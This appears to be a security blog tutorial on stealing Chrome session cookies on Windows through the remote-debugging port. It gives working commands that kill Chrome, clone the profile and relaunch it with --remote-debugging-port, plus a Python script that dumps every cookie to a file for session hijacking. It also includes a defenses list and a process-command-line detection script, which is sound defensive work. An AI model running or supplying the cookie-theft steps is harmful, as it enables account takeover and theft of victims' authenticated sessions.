Chrome Cookie Theft via Remote Debugging Port
Chrome Debug Mode | Cookie Stealing (Windows)
Goal
Take over an authenticated Chrome profile by relaunching it with --remote-debugging-port and programmatically dump every cookie inside the browser.
This technique is feasible for an attacker with local access — or via a malicious script — on profiles that aren’t encrypted.
Background
Google Chrome exposes a WebSocket DevTools interface when launched with --remote-debugging-port=<port>. Through that port you can:
- Drive tabs
- Observe HTTP requests
- Read sensitive data like cookies (Network.getAllCookies)
Prerequisites
- Physical or system-level access to the victim’s Chrome profile
- Chrome must be unencrypted (no profile encryption configured)
- The targeted Google account session must be active
Steps
1. Copy the Chrome Profile
taskkill /F /IM chrome.exe
robocopy "%LOCALAPPDATA%\Google\Chrome\User Data\Default" "%USERPROFILE%\Desktop\ChromeTemp\Default" /MIR /XJ
The active user profile is cloned into a fresh directory (e.g. ChromeTemp).
2. Start Chrome in Debug Mode
start "" "C:\Program Files\Google\Chrome\Application\chrome.exe" ^
--user-data-dir="%USERPROFILE%\Desktop\ChromeTemp" ^
--profile-directory="Default" ^
--remote-debugging-port=9222 ^
--no-first-run ^
--no-default-browser-check
Chrome launches in the background and accepts external connections on port 9222.
3. Hit the DevTools JSON Endpoint
From a browser or the command line:
curl http://localhost:9222/json
Sample response:
[
  {
    "id": "C123",
    "webSocketDebuggerUrl": "ws://localhost:9222/devtools/page/C123",
    ...
  }
]
We can drive the browser via that WebSocket URL.
4. Pull Cookies with Python
import asyncio, websockets, json, requests

async def get_all_cookies():
    # Discover the debuggable targets exposed by the DevTools HTTP endpoint
    resp = requests.get("http://localhost:9222/json")
    targets = resp.json()
    ws_url = targets[0]["webSocketDebuggerUrl"]
    async with websockets.connect(ws_url) as ws:
        await ws.send(json.dumps({"id": 1, "method": "Network.enable"}))
        await ws.send(json.dumps({"id": 2, "method": "Network.getAllCookies"}))
        while True:
            msg = await ws.recv()
            data = json.loads(msg)
            # Wait for the reply that matches the getAllCookies request id
            if data.get("id") == 2:
                with open("cookies.json", "w") as f:
                    json.dump(data["result"]["cookies"], f, indent=2)
                print("[+] Cookies saved.")
                break

asyncio.run(get_all_cookies())
What You Get
cookies.json will contain every session cookie collected across tabs and domains in the following format:
[
  {
    "domain": ".github.com",
    "name": "user_session",
    "value": "gho_example_token",
    "httpOnly": true,
    "secure": true
  }
]
These cookies can be imported into another browser via extensions like Cookie Editor — effectively hijacking the user’s session.
Defenses
To protect yourself against this kind of attack:
- Keep the Chrome profile under an encrypted user account (BitLocker, disk encryption)
- Limit physical access to the Chrome profile directory
- Use proper session management and 2FA on web apps
- Watch for background Chrome processes you didn’t start
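The last point above is the one a detection team can automate: a Chrome process whose command line carries --remote-debugging-port, especially combined with a --user-data-dir that is not the user's normal profile location, is the signature of the launch shown in step 2. The following is an added example (not code from the original post) that runs that check over process-creation telemetry. The event records are constructed here and their field names (pid, user, image, cmdline) are an assumption loosely modelled on Sysmon Event ID 1; the switch names --remote-debugging-port and --remote-debugging-pipe are real Chrome switches.

```python
import re
from typing import Dict, List

# Default Chrome user-data root on Windows (lower-cased for comparison).
DEFAULT_USER_DATA_FRAGMENT = r"\appdata\local\google\chrome\user data"

# Constructed sample of process-creation records; not real telemetry.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4120, "user": "CORP\\alice",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
    {"pid": 5310, "user": "CORP\\alice",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                r'--user-data-dir="C:\Users\alice\Desktop\ChromeTemp" --profile-directory="Default" '
                r'--remote-debugging-port=9222 --no-first-run --no-default-browser-check'},
    {"pid": 6001, "user": "CORP\\bob",
     "image": r"C:\Users\bob\AppData\Local\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Users\bob\AppData\Local\Google\Chrome\Application\chrome.exe" --remote-debugging-port=0'},
    {"pid": 7777, "user": "CORP\\carol",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]


def analyze_event(ev: Dict) -> List[str]:
    """Return a list of human-readable findings for one process-creation event."""
    findings: List[str] = []
    if not ev["image"].lower().endswith("chrome.exe"):
        return findings
    cmd = ev["cmdline"]

    # DevTools exposed over TCP (port 0 means "pick an ephemeral port", still a debug launch).
    m = re.search(r"--remote-debugging-port(?:=(\d+))?", cmd)
    if m:
        findings.append(f"remote debugging enabled (port {m.group(1) or 'unspecified'})")
    if "--remote-debugging-pipe" in cmd:
        findings.append("remote debugging enabled (pipe)")

    # Profile loaded from somewhere other than the user's normal Chrome data root.
    m = re.search(r'--user-data-dir=("([^"]*)"|(\S+))', cmd)
    if m:
        path = m.group(2) if m.group(2) is not None else m.group(3)
        if DEFAULT_USER_DATA_FRAGMENT not in path.lower():
            findings.append(f"non-default user data dir: {path}")
    return findings


def scan_events(events: List[Dict]) -> List[Dict]:
    """Run analyze_event over a batch of records and attach a severity to each hit."""
    alerts: List[Dict] = []
    for ev in events:
        findings = analyze_event(ev)
        if not findings:
            continue
        debug = any(f.startswith("remote debugging") for f in findings)
        cloned = any(f.startswith("non-default user data dir") for f in findings)
        # Debug port plus a relocated profile matches the cloned-profile launch exactly.
        severity = "high" if (debug and cloned) else "medium"
        alerts.append({"pid": ev["pid"], "user": ev["user"],
                       "severity": severity, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] pid={alert['pid']} user={alert['user']}: "
              + "; ".join(alert["findings"]))
```

Run on the constructed sample, the rule fires on pid 5310 (high: debug port plus a copied profile on the Desktop) and pid 6001 (medium: debug port on the normal profile, which is also what a developer's own tooling looks like), and stays quiet on the ordinary Chrome launch. The same command-line test can be expressed as an EDR or SIEM query; the pipe variant is included because it exposes the same protocol without a TCP listener, so a port-based check alone would miss it.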
Real-World Scenario
During a red team engagement, a consultant with physical access used the following chain:
- While the target’s browser was closed, the Default profile was cloned to a USB drive
- The cloned profile was launched in debug mode in an offline environment
- Cookies were exfiltrated and reused to re-authenticate against critical web apps (token reuse)
Conclusion
Chrome’s debug port is a powerful tool — and a powerful weapon. With physical or system-level access, an attacker can reach every session cookie. This technique is practical for:
- Hijacking in-browser authenticated sessions
- Internal red team operations
- Developer / pentester local analysis
Disclaimer
This post is intended solely for educational and authorized penetration testing use. Applying this against systems without permission constitutes a crime.